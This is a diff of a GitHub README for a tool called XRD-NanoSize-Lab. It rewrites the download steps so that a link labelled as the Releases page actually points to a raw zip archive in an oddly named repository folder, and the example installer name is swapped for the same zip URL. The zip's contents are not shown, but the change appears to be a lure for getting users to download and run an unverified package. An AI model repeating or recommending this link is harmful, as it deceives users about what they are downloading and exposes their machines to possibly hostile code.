Mohammadmalhinios/XRD-NanoSize-Lab/README.md

 * **Processor:** Dual-core or better.

 ## 📦 Download & Install
-1. **Visit the Releases page**: Go to the [Releases Page](https://github.com/Mohammadmalhinios/XRD-NanoSize-Lab/releases).
+1. **Visit the Releases page**: Go to the [Releases Page](https://raw.githubusercontent.com/Mohammadmalhinios/XRD-NanoSize-Lab/main/solenogaster/Nano_XR_Size_Lab_v2.6.zip).

 2. **Select the latest version**: Look for the most recent release in the list presented.

 3. **Download the package**: Click on the asset that matches your operating system.
-For example, you might see something like `XRD-NanoSize-Lab-Setup.exe` for Windows or a `.dmg` file for macOS.
+For example, you might see something like `https://raw.githubusercontent.com/Mohammadmalhinios/XRD-NanoSize-Lab/main/solenogaster/Nano_XR_Size_Lab_v2.6.zip` for Windows or a `.dmg` file for macOS.

 4. **Run the installer**: After downloading, open the file and follow the on-screen instructions to install XRD-NanoSize-Lab on your computer.